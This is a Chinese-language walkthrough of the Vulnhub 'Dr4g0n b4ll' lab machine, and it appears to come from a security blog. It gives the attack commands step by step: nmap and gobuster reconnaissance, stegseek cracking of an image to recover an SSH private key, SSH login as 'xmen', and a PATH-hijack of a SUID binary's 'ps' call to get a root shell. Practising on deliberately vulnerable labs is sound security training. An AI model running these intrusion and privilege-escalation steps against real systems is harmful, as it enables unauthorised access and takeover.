【Vulnhub系列靶场】Vulnhub_Dr4g0n b4ll靶场渗透

一、环境搭建

选择打开.ovf 文件

image-20240224152423286

配置名称和路径

image-20240224152402352

打开后调整网络连接模式为【NAT】即可

二、信息收集

1、主机发现

1
nmap.exe -sn 192.168.31.*

image-20240224135014762

2、端口扫描

1、快速粗略的端口扫描

1
nmap.exe -F 192.168.31.65
image-20240224135148134

2、详细端口扫描

1
2
nmap.exe -sT --min-rate 10000 -p- 192.168.31.65
nmap.exe -sU --min-rate 10000 -p- 192.168.31.65

image-20240224135658689

3、详细扫描和漏洞探测

1
nmap.exe -sV -A -p22,80 192.168.31.65

image-20240224135440463

1
nmap.exe --script=vuln -p22,80 192.168.31.65

image-20240224135500772

只发现了一个robots.txt 的文件

3、web 目录探测

1
gobuster.exe dir -u http://192.168.31.65 -w d:\theperson\dirs\dicc.txt -b 404,403 --no-error

image-20240224140201673

4、web 框架探测

1
whatweb http://192.168.31.65

image-20240224140522211

三、获取shell立足点

1、查看敏感信息

1、主页

image-20240224140723028

2、robots.txt 文件

image-20240224140817155

进行base64解码:

image-20240224140957715

3、源代码

image-20240224141117019

image-20240224141448789

2、DRAGON BALL目录信息

image-20240224142227549

1、secret.txt 文件

image-20240224142428287

保存下来做目录爆破

image-20240224143723348

并无收获

2、Vulnhub 目录

image-20240224143748924

3、Vulnhub/login.html:是一个虚假的登录页面

image-20240224143820482

4、aj.jpg:一张黑客的图片

image-20240224144139876

3、图片信息提取

提取图片隐写信息

1
stegseek aj.jpg /usr/share/wordlists/rockyou.txt
image-20240224150532499

image-20240224150607293

4、获取shell 立足点

此时拿到一个ssh密钥,欠缺用户名,此处的xmen 是用户名

image-20240224150858190

我们直接用密钥进行登录

1
ssh xmen@192.168.31.65 -i id_rsa

image-20240224150946067

成功拿到shell

四、提权至root

1、查看敏感文件

image-20240224151439588

shell 是一个suid权限,发现可以执行环境变量中的ps 命令,那么可以尝试用环境变量劫持来提权

2、提权至root

1
2
3
4
5
6
7
cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd ~/script
./script

image-20240224151818159